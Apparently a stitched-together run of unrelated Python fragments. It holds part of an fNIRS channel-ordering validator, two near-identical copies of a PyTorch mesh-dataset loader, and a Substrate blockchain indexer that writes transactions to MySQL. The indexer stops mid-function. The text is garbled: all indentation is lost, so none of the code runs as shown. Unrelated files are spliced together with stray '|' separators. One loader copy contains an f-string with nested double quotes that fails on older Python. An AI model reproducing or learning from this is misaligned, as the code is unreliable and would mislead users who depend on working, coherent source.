ch2_name_info = _S_D_H_RE.match(info['chs'][ii + 1]['ch_name'])
if bool(ch2_name_info) & bool(ch1_name_info):
first_value = ch1_name_info.groups()[2]
second_value = ch2_name_info.groups()[2]
error_word = "chromophore"
if (first_value not in ["hbo", "hbr"] or
second_value not in ["hbo", "hbr"]):
raise ValueError(
"NIRS channels have specified naming conventions."
"Chromophore data must be labeled either hbo or hbr."
"Failing channels are "
f"{info['chs'][ii]['ch_name']}, "
f"{info['chs'][ii + 1]['ch_name']}")
else:
raise ValueError(
'NIRS channels have specified naming conventions.'
'The provided channel names can not be parsed.'
f'Channels are {info.ch_names}')
if (ch1_name_info.groups()[0] != ch2_name_info.groups()[0]) or \
(ch1_name_info.groups()[1] != ch2_name_info.groups()[1]) or \
(first_value != pair_vals[0]) or \
(second_value != pair_vals[1]):
raise ValueError(
'NIRS channels not ordered correctly. Channels must be ordered'
' as source detector pairs with alternating'
f' {error_word}: {pair_vals[0]} & {pair_vals[1]}')
_fnirs_check_bads(info)
return picks_cw
def _validate_nirs_info(info):
"""Apply all checks to fNIRS info. Works on all continuous wave types."""
freqs = np.unique(_channel_frequencies(info, nominal=True))
if freqs.size > 0:
picks = _check_channels_ordered(info, freqs)
else:
picks = _check_channels_ordered(info,
np.unique(_channel_chromophore(info)))
return picks
def _fnirs_check_bads(info):
"""Check consistent labeling of bads across fnirs optodes."""
# For an optode pair, if one component (light frequency or chroma) is
# marked as bad then they all should be. This function checks that all
# optodes are marked bad consistently.
picks = _picks_to_idx(info, 'fnirs', exclude=[], allow_empty=True)
for ii in picks[::2]:
want = info.ch_names[ii:ii + 2]
got = list(set(info['bads']).intersection(want))
if len(got) == 1:
raise RuntimeError(
f'NIRS bad labelling is not consistent, found {got} but '
f'needed {want}')
def _fnirs_spread_bads(info):
"""Spread bad labeling across fnirs channels."""
# For an optode pair if any component (light frequency or chroma) is marked
# as bad, then they all should be. This function will find any pairs marked
# as bad and spread the bad marking to all components of the optode pair.
picks = _picks_to_idx(info, 'fnirs', exclude=[], allow_empty=True)
new_bads = list()
for ii in picks[::2]:
bad_opto = set(info['bads']).intersection(info.ch_names[ii:ii + 2])
if len(bad_opto) > 0:
new_bads.extend(info.ch_names[ii:ii + 2])
info['bads'] = new_bads
return info
|
from torch.utils.data import Dataset, DataLoader, Subset
from zipfile import BadZipFile
import os
from process_data import files_utils, mesh_utils, points_utils
import options
from constants import DATASET
from custom_types import *
import json
class MeshDataset(Dataset):
@property
def transforms(self):
return self.opt.transforms
@property
def recon(self) -> bool:
return self.opt.recon
def cache_path(self, idx) -> str:
return os.path.join(DATASET, self.opt.tag, f'{self.opt.info}_{idx:04d}.npy')
def data_path(self, idx) -> str:
return os.path.join(DATASET, self.opt.tag, f'{self.opt.tag}_{idx:04d}.npz')
def delete_cache(self):
if self.cache_length > 0:
for idx in range(len(self)):
cache_path = self.cache_path(idx)
if os.path.isfile(cache_path):
os.remove(cache_path)
def __del__(self):
self.delete_cache()
@staticmethod
def join2root(sub_name) -> str:
return os.path.join(DATASET, sub_name)
def get_taxonomy_models_paths(self):
with open(self.join2root('taxonomy.json'), 'r') as f:
metadata = json.load(f)
for info in metadata:
class_name = info['name'].split(',')[0].replace(' ', '_')
if class_name == self.opt.tag:
taxonomy_dir = self.join2root(info['synsetId'])
if os.path.isdir(taxonomy_dir):
return files_utils.collect(taxonomy_dir, '.obj', '.off')
def sample_sub_points(self, data: mesh_utils.MeshWrap):
p = self.opt.partial_range[0] + np.random.random() * (self.opt.partial_range[1] - self.opt.partial_range[0])
sub_mesh, sub_areas = mesh_utils.split_mesh_side(data.mesh(), data['face_centers'], data['face_areas'],
data['total_area'], p)
sub_points = mesh_utils.sample_on_mesh(sub_mesh, sub_areas, self.opt.partial_samples[1])
return sub_points
def get_sub_points(self, idx: int, data: mesh_utils.MeshWrap) -> V:
if self.cache_length < 1:
return self.sample_sub_points(data)
else:
cache_path = self.cache_path(idx)
if not os.path.isfile(cache_path):
sub_pc_data = [np.expand_dims(self.sample_sub_points(data), axis=0) for _ in range(self.cache_length)]
sub_pc_data = np.concatenate(sub_pc_data, axis=0)
np.save(cache_path[:-4], sub_pc_data)
else:
sub_pc_data = np.load(cache_path)
pc_idx = int(np.random.randint(0, self.cache_length))
return sub_pc_data[pc_idx]
def get_transformed_pc(self, idx: int, data: mesh_utils.MeshWrap, base_points: V) -> Tuple[VS, VS]:
partial = self.get_sub_points(idx, data)
partial, transforms = points_utils.apply_transforms(self.transforms, base_points, partial)
return partial, transforms
def __getitem__(self, idx):
data = self.load_mesh(idx)
mesh, face_areas = data.mesh(), data['face_areas']
points = mesh_utils.sample_on_mesh(mesh, face_areas, self.opt.partial_samples[0])
if self.recon or len(self.transforms) > 0:
pc_trans, transforms = self.get_transformed_pc(idx, data, points)
return [points] + [pc.astype(np.float32) for pc in pc_trans] + [tr.astype(np.float32) for tr in transforms]
else:
return points
def __len__(self):
return len(self.data_paths)
@staticmethod
def first_load(mesh_path: str, data_path: str) -> mesh_utils.MeshWrap:
vs, faces = mesh_utils.load_mesh(mesh_path)
hold = vs[:, 1].copy()
# swapping y and z
vs[:, 1] = vs[:, 2]
vs[:, 2] = hold
mesh = (vs, faces)
mesh = mesh_utils.to_unit(mesh)
face_areas, face_normals = mesh_utils.compute_face_areas(mesh)
face_centers = mesh_utils.compute_faces_centers(mesh)
data = {'vs': mesh[0], 'faces': mesh[1], 'face_areas': face_areas, 'face_normals': face_normals,
'total_area': face_areas.sum(), 'face_ne': mesh_utils.compute_face_ne(mesh),
'face_centers': face_centers}
np.savez_compressed(data_path, **data)
return mesh_utils.MeshWrap(data)
def load_mesh(self, idx: int) -> mesh_utils.MeshWrap:
if self.all_data[idx] is None:
requested_att = ['vs', 'faces', 'face_areas', 'face_normals', 'face_ne', 'total_area', 'face_centers']
base_path = self.data_paths[idx]
mesh_path = os.path.join(base_path[0], f'{base_path[1]}{base_path[2]}')
data_path = self.data_path(idx)
if os.path.isfile(data_path):
try:
data = np.load(data_path)
if sum([int(att not in data) for att in requested_att]) == 0:
self.all_data[idx] = mesh_utils.MeshWrap(dict(data))
except BadZipFile:
print("BadZipFile")
self.all_data[idx] = self.first_load(mesh_path, data_path)
else:
self.all_data[idx] = self.first_load(mesh_path, data_path)
return self.all_data[idx]
def __init__(self, opt: options.Options, cache_length:int):
super(MeshDataset, self).__init__()
self.opt = opt
files_utils.init_folders(self.data_path(0))
self.data_paths = self.get_taxonomy_models_paths()
self.cache_length = cache_length
self.all_data: List[Union[N, mesh_utils.MeshWrap]] = [None] * len(self)
self.delete_cache()
class AnotherLoaderWrap:
def __init__(self, base_loader, batch_size):
self.base_loader = base_loader
self.batch_size = batch_size
self.choices = np.arange(len(self.base_loader.dataset))
self.wrap_iter, self.counter = self.init_iter()
def __iter__(self):
return self.base_loader.__iter__()
def init_iter(self):
return self.__iter__(), len(self.base_loader.dataset)
def __next__(self):
if self.counter < 0:
self.wrap_iter, self.counter = self.init_iter()
self.counter = self.counter - self.batch_size
return next(self.wrap_iter)
def get_random_batch(self):
indices = np.random.choice(self.choices, self.batch_size, replace=False)
batch = [self.base_loader.dataset[idx] for idx in indices]
return indices, self.base_loader.collate_fn(batch)
def get_by_ids(self, *indices):
batch = [self.base_loader.dataset[idx] for idx in indices]
return self.base_loader.collate_fn(batch)
def __getitem__(self, idx):
return self.base_loader.dataset[idx]
def __len__(self):
return len(self.base_loader.dataset)
def get_loader(opt: options.Options, train=True) -> DataLoader:
dataset = MeshDataset(opt, 20)
ds_length = len(dataset)
if 'vae' not in opt.task:
splits_file = f'{DATASET}/{opt.tag}/{opt.tag}_split'
if os.path.isfile(splits_file + '.npy'):
ds_inds = np.load(splits_file + '.npy')
else:
ds_inds = np.arange(ds_length)
np.random.shuffle(ds_inds)
np.save(splits_file, ds_inds)
inds = {True: ds_inds[int(0.1 * ds_length):], False: ds_inds[:int(0.1 * ds_length)]}
dataset = Subset(dataset, inds[train])
loader = DataLoader(dataset, batch_size=opt.batch_size, num_workers=1 + (2 * train), shuffle=(train),
drop_last=(train))
print(f"{opt.tag}- {"train" if train else "test"} dataset length is: {len(dataset)}")
return loader
| from torch.utils.data import Dataset, DataLoader, Subset
from zipfile import BadZipFile
import os
from process_data import files_utils, mesh_utils, points_utils
import options
from constants import DATASET
from custom_types import *
import json
class MeshDataset(Dataset):
@property
def transforms(self):
return self.opt.transforms
@property
def recon(self) -> bool:
return self.opt.recon
def cache_path(self, idx) -> str:
return os.path.join(DATASET, self.opt.tag, f'{self.opt.info}_{idx:04d}.npy')
def data_path(self, idx) -> str:
return os.path.join(DATASET, self.opt.tag, f'{self.opt.tag}_{idx:04d}.npz')
def delete_cache(self):
if self.cache_length > 0:
for idx in range(len(self)):
cache_path = self.cache_path(idx)
if os.path.isfile(cache_path):
os.remove(cache_path)
def __del__(self):
self.delete_cache()
@staticmethod
def join2root(sub_name) -> str:
return os.path.join(DATASET, sub_name)
def get_taxonomy_models_paths(self):
with open(self.join2root('taxonomy.json'), 'r') as f:
metadata = json.load(f)
for info in metadata:
class_name = info['name'].split(',')[0].replace(' ', '_')
if class_name == self.opt.tag:
taxonomy_dir = self.join2root(info['synsetId'])
if os.path.isdir(taxonomy_dir):
return files_utils.collect(taxonomy_dir, '.obj', '.off')
def sample_sub_points(self, data: mesh_utils.MeshWrap):
p = self.opt.partial_range[0] + np.random.random() * (self.opt.partial_range[1] - self.opt.partial_range[0])
sub_mesh, sub_areas = mesh_utils.split_mesh_side(data.mesh(), data['face_centers'], data['face_areas'],
data['total_area'], p)
sub_points = mesh_utils.sample_on_mesh(sub_mesh, sub_areas, self.opt.partial_samples[1])
return sub_points
def get_sub_points(self, idx: int, data: mesh_utils.MeshWrap) -> V:
if self.cache_length < 1:
return self.sample_sub_points(data)
else:
cache_path = self.cache_path(idx)
if not os.path.isfile(cache_path):
sub_pc_data = [np.expand_dims(self.sample_sub_points(data), axis=0) for _ in range(self.cache_length)]
sub_pc_data = np.concatenate(sub_pc_data, axis=0)
np.save(cache_path[:-4], sub_pc_data)
else:
sub_pc_data = np.load(cache_path)
pc_idx = int(np.random.randint(0, self.cache_length))
return sub_pc_data[pc_idx]
def get_transformed_pc(self, idx: int, data: mesh_utils.MeshWrap, base_points: V) -> Tuple[VS, VS]:
partial = self.get_sub_points(idx, data)
partial, transforms = points_utils.apply_transforms(self.transforms, base_points, partial)
return partial, transforms
def __getitem__(self, idx):
data = self.load_mesh(idx)
mesh, face_areas = data.mesh(), data['face_areas']
points = mesh_utils.sample_on_mesh(mesh, face_areas, self.opt.partial_samples[0])
if self.recon or len(self.transforms) > 0:
pc_trans, transforms = self.get_transformed_pc(idx, data, points)
return [points] + [pc.astype(np.float32) for pc in pc_trans] + [tr.astype(np.float32) for tr in transforms]
else:
return points
def __len__(self):
return len(self.data_paths)
@staticmethod
def first_load(mesh_path: str, data_path: str) -> mesh_utils.MeshWrap:
vs, faces = mesh_utils.load_mesh(mesh_path)
hold = vs[:, 1].copy()
# swapping y and z
vs[:, 1] = vs[:, 2]
vs[:, 2] = hold
mesh = (vs, faces)
mesh = mesh_utils.to_unit(mesh)
face_areas, face_normals = mesh_utils.compute_face_areas(mesh)
face_centers = mesh_utils.compute_faces_centers(mesh)
data = {'vs': mesh[0], 'faces': mesh[1], 'face_areas': face_areas, 'face_normals': face_normals,
'total_area': face_areas.sum(), 'face_ne': mesh_utils.compute_face_ne(mesh),
'face_centers': face_centers}
np.savez_compressed(data_path, **data)
return mesh_utils.MeshWrap(data)
def load_mesh(self, idx: int) -> mesh_utils.MeshWrap:
if self.all_data[idx] is None:
requested_att = ['vs', 'faces', 'face_areas', 'face_normals', 'face_ne', 'total_area', 'face_centers']
base_path = self.data_paths[idx]
mesh_path = os.path.join(base_path[0], f'{base_path[1]}{base_path[2]}')
data_path = self.data_path(idx)
if os.path.isfile(data_path):
try:
data = np.load(data_path)
if sum([int(att not in data) for att in requested_att]) == 0:
self.all_data[idx] = mesh_utils.MeshWrap(dict(data))
except BadZipFile:
print("BadZipFile")
self.all_data[idx] = self.first_load(mesh_path, data_path)
else:
self.all_data[idx] = self.first_load(mesh_path, data_path)
return self.all_data[idx]
def __init__(self, opt: options.Options, cache_length:int):
super(MeshDataset, self).__init__()
self.opt = opt
files_utils.init_folders(self.data_path(0))
self.data_paths = self.get_taxonomy_models_paths()
self.cache_length = cache_length
self.all_data: List[Union[N, mesh_utils.MeshWrap]] = [None] * len(self)
self.delete_cache()
class AnotherLoaderWrap:
def __init__(self, base_loader, batch_size):
self.base_loader = base_loader
self.batch_size = batch_size
self.choices = np.arange(len(self.base_loader.dataset))
self.wrap_iter, self.counter = self.init_iter()
def __iter__(self):
return self.base_loader.__iter__()
def init_iter(self):
return self.__iter__(), len(self.base_loader.dataset)
def __next__(self):
if self.counter < 0:
self.wrap_iter, self.counter = self.init_iter()
self.counter = self.counter - self.batch_size
return next(self.wrap_iter)
def get_random_batch(self):
indices = np.random.choice(self.choices, self.batch_size, replace=False)
batch = [self.base_loader.dataset[idx] for idx in indices]
return indices, self.base_loader.collate_fn(batch)
def get_by_ids(self, *indices):
batch = [self.base_loader.dataset[idx] for idx in indices]
return self.base_loader.collate_fn(batch)
def __getitem__(self, idx):
return self.base_loader.dataset[idx]
def __len__(self):
return len(self.base_loader.dataset)
def get_loader(opt: options.Options, train=True) -> DataLoader:
dataset = MeshDataset(opt, 20)
ds_length = len(dataset)
if 'vae' not in opt.task:
splits_file = f'{DATASET}/{opt.tag}/{opt.tag}_split'
if os.path.isfile(splits_file + '.npy'):
ds_inds = np.load(splits_file + '.npy')
else:
ds_inds = np.arange(ds_length)
np.random.shuffle(ds_inds)
np.save(splits_file, ds_inds)
inds = {True: ds_inds[int(0.1 * ds_length):], False: ds_inds[:int(0.1 * ds_length)]}
dataset = Subset(dataset, inds[train])
loader = DataLoader(dataset, batch_size=opt.batch_size, num_workers=1 + (2 * train), shuffle=(train),
drop_last=(train))
print(f"{opt.tag}- {'train' if train else 'test'} dataset length is: {len(dataset)}")
return loader
|
# The App listening to new blocks written read the exstrincs and store the transactions in a mysql/mariadb database.
# the database must be created, the app will create the tables and indexes used.
# import libraries
# system packages
import sys
import os
import json
# Substrate module
from substrateinterface import SubstrateInterface, Keypair,ExtrinsicReceipt
from substrateinterface.exceptions import SubstrateRequestException
# base64 encoder/decoder
import base64
# base58 encoder/decoder
import base58
#import scale library to load data types
import scalecodec
# import mysql connector
import mysql.connector
currentime=""
# read environment variables
try:
DB_NAME=os.environ['DB_NAME']
DB_USER=os.environ['DB_USER']
DB_PWD=os.environ['DB_PWD']
DB_HOST=os.environ['DB_HOST']
NODE=os.environ['NODE']
except NameError:
print("System Variables have not been set")
exit(1)
# function to load data types registry
def load_type_registry_file(file_path: str) -> dict:
with open(os.path.abspath(file_path), 'r') as fp:
data = fp.read()
return json.loads(data)
# function to create tables required
def create_tables():
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
cursor = cnx.cursor()
# use database
try:
cursor.execute("USE {}".format(DB_NAME))
except mysql.connector.Error as err:
print("Database {} does not exists.".format(DB_NAME))
print(err)
exit(1)
# create tables
createtx="CREATE TABLE `transactions` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\
`blocknumber` INT(11) NOT NULL,`txhash` VARCHAR(66) NOT NULL, \
`sender` VARCHAR(64) NOT NULL, `recipient` VARCHAR(64) NOT NULL, \
`amount` numeric(32,0) NOT NULL, \
`gasfees` numeric(32,0) NOT NULL, \
`dtblockchain` DATETIME NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),PRIMARY KEY (id))"
try:
print("Creating table TRANSACTIONS...")
cursor.execute(createtx)
except mysql.connector.Error as err:
if(err.msg!="Table 'transactions' already exists"):
print(err.msg)
else:
print("OK")
# create indexes
createidxtx="CREATE INDEX txhash on transactions(txhash)"
try:
print("Creating index TXHASH on TRANSACTIONS...")
cursor.execute(createidxtx)
except mysql.connector.Error as err:
if(err.msg!="Duplicate key name 'txhash'"):
print(err.msg)
else:
print("OK")
createidxtx="CREATE INDEX sender on transactions(sender)"
try:
print("Creating index SENDER on TRANSACTIONS...")
cursor.execute(createidxtx)
except mysql.connector.Error as err:
if(err.msg!="Duplicate key name 'sender'"):
print(err.msg)
else:
print("OK")
createidxtx="CREATE INDEX recipient on transactions(recipient)"
try:
print("Creating index RECIPIENT on TRANSACTIONS...")
cursor.execute(createidxtx)
except mysql.connector.Error as err:
if(err.msg!="Duplicate key name 'recipient'"):
print(err.msg)
else:
print("OK")
# creating sync table to keep syncronisation info
createsync="CREATE TABLE `sync` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\
`lastblocknumberverified` INT(11) NOT NULL, \
`lastapprovalrequestprocessed` int(11) default 0 not null,\
PRIMARY KEY (id))"
try:
print("Creating table SYNC...")
cursor.execute(createsync)
except mysql.connector.Error as err:
if(err.msg!="Table 'sync' already exists"):
print(err.msg)
else:
print("OK")
# creating categories table for impact actions
createcategories="CREATE TABLE `impactactionscategories` (`id` MEDIUMINT NOT NULL,\
`blocknumber` INT(11) NOT NULL,\
`txhash` VARCHAR(66) NOT NULL,\
`dtblockchain` DATETIME NOT NULL,\
`signer` VARCHAR(48) NOT NULL,\
`description` VARCHAR(64) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash), PRIMARY KEY (id))"
try:
print("Creating table impactactionscategories...")
cursor.execute(createcategories)
except mysql.connector.Error as err:
if(err.msg!="Table 'impactactionscategories' already exists"):
print(err.msg)
else:
print("OK")
# creating impactactions table for impact actions
createactions="CREATE TABLE `impactactions` (`id` MEDIUMINT NOT NULL,\
`blocknumber` INT(11) NOT NULL,\
`txhash` VARCHAR(66) NOT NULL,\
`dtblockchain` DATETIME NOT NULL,\
`signer` VARCHAR(48) NOT NULL,\
`description` VARCHAR(128) NOT NULL,\
`category` INT(11) NOT NULL,`auditors` INT(11) NOT NULL,`blockstart` INT(11) NOT NULL,\
`blockend` INT(11) NOT NULL, `rewardstoken` INT(11) NOT NULL, `rewardsamount` INT(32) NOT NULL,\
`rewardsoracle` INT(32) NOT NULL,`rewardauditors` INT(32) NOT NULL,\
`slashingsauditors` INT(32) NOT NULL,`maxerrorsauditor` INT(11) NOT NULL,\
`fields` varchar(8192) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash), \
PRIMARY KEY (id))"
try:
print("Creating table impactactions...")
cursor.execute(createactions)
except mysql.connector.Error as err:
if(err.msg!="Table 'impactactions' already exists"):
print(err.msg)
else:
print("OK")
# creating impactactionsoracles table for impact actions
createactions="CREATE TABLE `impactactionsoracles` (`id` MEDIUMINT NOT NULL,\
`blocknumber` INT(11) NOT NULL,\
`txhash` VARCHAR(66) NOT NULL,\
`dtblockchain` DATETIME NOT NULL,\
`signer` VARCHAR(48) NOT NULL,\
`description` VARCHAR(128) NOT NULL,\
`account` VARCHAR(48) NOT NULL,`otherinfo` VARCHAR(66) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),\
PRIMARY KEY (id))"
try:
print("Creating table impactactionsoracles...")
cursor.execute(createactions)
except mysql.connector.Error as err:
if(err.msg!="Table 'impactactionsoracles' already exists"):
print(err.msg)
else:
print("OK")
# creating impactactionsauditors table for impact actions
createactions="CREATE TABLE `impactactionsauditors` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\
`blocknumber` INT(11) NOT NULL,\
`txhash` VARCHAR(66) NOT NULL,\
`dtblockchain` DATETIME NOT NULL,\
`signer` VARCHAR(48) NOT NULL,\
`description` VARCHAR(128) NOT NULL,\
`account` VARCHAR(48) NOT NULL,`categories` VARCHAR(128) NOT NULL,\
`area` VARCHAR(64) NOT NULL,`otherinfo` VARCHAR(66) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),\
PRIMARY KEY (id))"
try:
print("Creating table impactactionsauditors...")
cursor.execute(createactions)
except mysql.connector.Error as err:
if(err.msg!="Table 'impactactionsauditors' already exists"):
print(err.msg)
else:
print("OK")
# creating impactactionsproxy table for impact actions
createactions="CREATE TABLE `impactactionsproxy` (`id` MEDIUMINT NOT NULL,\
`blocknumber` INT(11) NOT NULL,\
`txhash` VARCHAR(66) NOT NULL,\
`dtblockchain` DATETIME NOT NULL,\
`signer` VARCHAR(48) NOT NULL,\
`account` VARCHAR(48) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),PRIMARY KEY (id))"
try:
print("Creating table impactactionsproxy...")
cursor.execute(createactions)
except mysql.connector.Error as err:
if(err.msg!="Table 'impactactionsproxy' already exists"):
print(err.msg)
else:
print("OK")
# creating impactactionsapprovalrequests table for impact actions
createactions="CREATE TABLE `impactactionsapprovalrequests` (`id` MEDIUMINT NOT NULL,\
`blocknumber` INT(11) NOT NULL,\
`txhash` VARCHAR(66) NOT NULL,\
`dtblockchain` DATETIME NOT NULL,\
`signer` VARCHAR(48) NOT NULL,\
`info` VARCHAR(8192) NOT NULL,\
`dtapproved` DATETIME,\
`dtrefused` DATETIME,\
CONSTRAINT txhash_unique UNIQUE (txhash),PRIMARY KEY (id))"
try:
print("Creating table impactactionsapprovalrequests...")
cursor.execute(createactions)
except mysql.connector.Error as err:
if(err.msg!="Table 'impactactionsapprovalrequests' already exists"):
print(err.msg)
else:
print("OK")
# creating impactactionsapprovalrequestsauditors table for impact actions
createactions="CREATE TABLE `impactactionsapprovalrequestsauditors` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\
`blocknumber` INT(11) NOT NULL,\
`txhash` VARCHAR(66) NOT NULL,\
`dtblockchain` DATETIME NOT NULL,\
`signer` VARCHAR(48) NOT NULL,\
`approvalrequestid` int(11) NOT NULL,\
`auditor` VARCHAR(48) NOT NULL,\
`maxdays` INT(11) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),PRIMARY KEY (id))"
try:
print("Creating table impactactionsapprovalrequestsauditors...")
cursor.execute(createactions)
except mysql.connector.Error as err:
if(err.msg!="Table 'impactactionsapprovalrequestsauditors' already exists"):
print(err.msg)
else:
print("OK")
# creating impactactionsapprovalrequestvotes table for impact actions
createactions="CREATE TABLE `impactactionsapprovalrequestauditorvotes` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\
`blocknumber` INT(11) NOT NULL,\
`txhash` VARCHAR(66) NOT NULL,\
`dtblockchain` DATETIME NOT NULL,\
`signer` VARCHAR(48) NOT NULL,\
`approvalrequestid` int(11) NOT NULL,\
`vote` VARCHAR(1) NOT NULL,\
`otherinfo` VARCHAR(66) NOT NULL,\
`dtrewards` DATETIME NOT NULL,\
CONSTRAINT txhash_unique UNIQUE (txhash),PRIMARY KEY (id))"
try:
print("Creating table impactactionsapprovalrequestauditorvotes...")
cursor.execute(createactions)
except mysql.connector.Error as err:
if(err.msg!="Table 'impactactionsapprovalrequestauditorvotes' already exists"):
print(err.msg)
else:
print("OK")
# creating assets table for FT
createassets="CREATE TABLE `ftassets` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\
`blocknumber` INT(11) NOT NULL,\
`txhash` VARCHAR(66) NOT NULL,\
`dtblockchain` DATETIME NOT NULL,\
`signer` VARCHAR(48) NOT NULL,\
`assetid` int(11) NOT NULL,\
`owner` VARCHAR(48) NOT NULL,\
`maxzombies` int(11) NOT NULL,\
`minbalance` int(11) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),\
PRIMARY KEY (id))"
try:
print("Creating table ftassets...")
cursor.execute(createassets)
except mysql.connector.Error as err:
if(err.msg!="Table 'ftassets' already exists"):
print(err.msg)
else:
print("OK")
# creating transaction for fungible tokens
createassets="CREATE TABLE `fttransactions` (`id` MEDIUMINT NOT NULL AUTO_INCREMENT,\
`blocknumber` INT(11) NOT NULL,\
`txhash` VARCHAR(66) NOT NULL,\
`dtblockchain` DATETIME NOT NULL,\
`signer` VARCHAR(48) NOT NULL,\
`sender` VARCHAR(48) NOT NULL,\
`category` VARCHAR(20) NOT NULL,\
`assetid` int(11) NOT NULL,\
`recipient` VARCHAR(48) NOT NULL,\
`amount` int(11) NOT NULL, CONSTRAINT txhash_unique UNIQUE (txhash),\
PRIMARY KEY (id))"
try:
print("Creating table fttransactions...")
cursor.execute(createassets)
except mysql.connector.Error as err:
if(err.msg!="Table 'fttransactions' already exists"):
print(err.msg)
else:
print("OK")
#closing database
cursor.close()
cnx.close()
# function to syncronise the blockchain reading the old blocks if not yet loaded
def sync_blockchain(substrate):
# we get the the last block from the blockchain
r=substrate.rpc_request(method='chain_getHeader',params=[],result_handler=None)
rs=r.get('result')
lastblockhex=rs.get('number')
lastblocknumber=int(lastblockhex,16)
print("[Info] Last Block: ",lastblocknumber)
# we check the last block reconcilied
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
cursor = cnx.cursor(dictionary=True)
lastblocknumberverified=0
query="select * from sync limit 1"
try:
cursor.execute(query)
for row in cursor:
lastblocknumberverified=row['lastblocknumberverified']
#lastblocknumberverified=row.get('lastblocknumberverified')
except mysql.connector.Error as err:
print(err.msg)
lastblocknumberverified=0
print("[INFO] Last block number verified:",lastblocknumberverified)
# loop the new block number to find gaps and fill them in case
x=lastblocknumberverified+1
cursor.close()
cursorb = cnx.cursor()
print("[INFO] Syncing previous blocks...")
while x<=lastblocknumber:
# get block data
print("Syncing block # ",x)
# process the block of data
process_block(x)
# update sync
sqlst=""
if(lastblocknumberverified==0):
sqlst="insert into sync set lastblocknumberverified="+str(x)
else:
sqlst="update sync set lastblocknumberverified="+str(x)
try:
cursorb.execute(sqlst)
cnx.commit()
except mysql.connector.Error as err:
print(err.msg)
lastblocknumberverified=x
# increase block number
x=x+1
#end while loop
cursorb.close()
cnx.close()
# function to store a new transaction
def store_transaction(blocknumber,txhash,sender,recipient,amount,currenttime,gasfees):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
print("Storing New Transaction")
print("TxHash: ",txhash)
print("Current time: ",currentime)
print("Sender: ",sender)
print("Recipient: ",recipient)
print("Amount: ",amount)
print("`Gas fees`: ",gasfees)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into transactions set blocknumber=%s,txhash=%s,sender=%s,recipient=%s,amount=%s,gasfees=%s,dtblockchain=%s"
datatx=(blocknumber,txhash,sender,recipient,amount,gasfees,dtblockchain)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print(err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - New Impact Action
def impactactions_newimpactaction(blocknumber,txhash,signer,currenttime,idimpactaction,data):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
#decode json structure
j=json.loads(data)
print("Storing New Impact Action")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Id: ",idimpactaction)
print("Data: ",data)
print("Category: ",j['category'])
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into impactactions set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s,id=%s"
addtx=addtx+",description=%s,category=%s,auditors=%s,blockstart=%s,blockend=%s,rewardstoken=%s,rewardsamount=%s,rewardsoracle=%s"
addtx=addtx+",rewardauditors=%s,slashingsauditors=%s,maxerrorsauditor=%s,fields=%s"
if 'fields' in j:
f=j['fields']
else:
f={}
datatx=(blocknumber,txhash,signer,dtblockchain,idimpactaction,j['description'],j['category'],j['auditors'],j['blockstart'],j['blockend'],j['rewardstoken'],j['rewardsamount'],j['rewardsoracle'],j['rewardsauditors'],j['slashingsauditors'],j['maxerrorsauditor'],json.dumps(f))
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - Destroy Impact Actions
def impactactions_destroyimpactaction(blocknumber,txhash,signer,currenttime,idimpactaction):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
print("Destroy Impact Action")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Id Impact Action: ",idimpactaction)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
deltx="delete from impactactions where id=%s"
datatx=(idimpactaction,)
try:
cursor.execute(deltx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - New Oracle
def impactactions_neworacle(blocknumber,txhash,signer,currenttime,idoracle,data):
cnx = mysql.connector.connect(user=DB_USER, password=DB_PWD,host=DB_HOST,database=DB_NAME)
#decode json structure
j=json.loads(data)
print("Storing New Oracle")
print("BlockNumber: ",blocknumber)
print("TxHash: ",txhash)
print("Current time: ",currenttime)
print("Signer: ",signer)
print("Id: ",idoracle)
print("Data: ",data)
cursor = cnx.cursor()
dtblockchain=currenttime.replace("T"," ")
dtblockchain=dtblockchain[0:19]
addtx="insert into impactactionsoracles set blocknumber=%s,txhash=%s,signer=%s,dtblockchain=%s,id=%s"
addtx=addtx+",description=%s,account=%s,otherinfo=%s"
if 'otherinfo' in j:
o=j['otherinfo']
else:
o=''
datatx=(blocknumber,txhash,signer,dtblockchain,idoracle,j['description'],j['account'],o)
try:
cursor.execute(addtx,datatx)
except mysql.connector.Error as err:
print("[Error] ",err.msg)
cnx.commit()
cursor.close()
cnx.close()
# function to store Impact Actions - Destroy Oracle
def impactactions_destroyoracle(blocknumber,txhash,signer,currenttime,idoracle):
